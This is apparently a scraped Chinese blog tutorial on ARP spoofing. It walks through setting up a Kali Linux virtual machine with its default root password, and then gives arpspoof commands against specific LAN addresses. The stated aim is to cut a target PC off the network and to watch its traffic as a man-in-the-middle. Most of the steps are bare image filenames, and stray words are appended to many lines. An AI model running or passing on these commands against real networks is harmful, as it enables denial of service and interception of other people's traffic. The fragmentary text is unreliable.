地址解析協議ARP

地址解析協議ARP網絡


  1. 準備工做ide

    (1)找到虛擬機Kali-Linux-2.0.0-vm-i686打開blog

      (以本機示例爲:計算機 -> F盤 -> 解壓Kali-Linux-2.0.0-vm-i686 -> 打開Kali-Linux-2.0.0-vm-i686.vmx -> 開啓此虛擬機 -> Username:root -> Password:toor)ci

    (2)重啓虛擬機get

    (3)Username:root -> Password:toor 虛擬機

    (4)改爲橋接模式it


    wKioL1fiPCCw6-gXAAAOCEbQnhA158.png-wh_50wKioL1fiPCCglsatAAAD6syhiik932.png-wh_50

    wKiom1fiPCGB-6q6AACHSGJzrHY714.png-wh_50

    (5)io

  wKioL1fiPRCAAGB9AAOLQg1lJvg098.png-wh_50

  (6)class

  

  wKioL1fiPbfDCuf1AAAiDxoeqZY192.png-wh_50

  wKiom1fiPaOjsLLEAAAMqHYlsJc404.png-wh_50

  wKioL1fiPrfRHJsWAABgvL-f4bw777.png-wh_50

  wKioL1fiPtrwVP0pAAAJoJOPqBk832.png-wh_50

  wKiom1fiPuuBA3cCAAAEbLmYaD0584.png-wh_50

  

  wKioL1fiPxiR_rhMAAB-SBHu4-0960.png-wh_50

  wKiom1fiPxmzMHZZAAAgcBY0yPQ759.png-wh_50

  (7)右鍵 -> Open Terminal ->ping一個地址(如:ping 172.28.15.22)(ctrl+c中止)float

  (8)arpspoof -i eth0 -t 172.28.15.133 172.28.15.254(ARP欺騙,做用爲斷掉了IP地址爲172.28.15.133的PC機的網絡)

  (9)arpspoof -i eth0 -t 172.28.15.254 172.28.15.133(做用爲能夠清楚知道IP地址爲172.28.15.133的PC機正在用網絡作什麼)

相關文章
相關標籤/搜索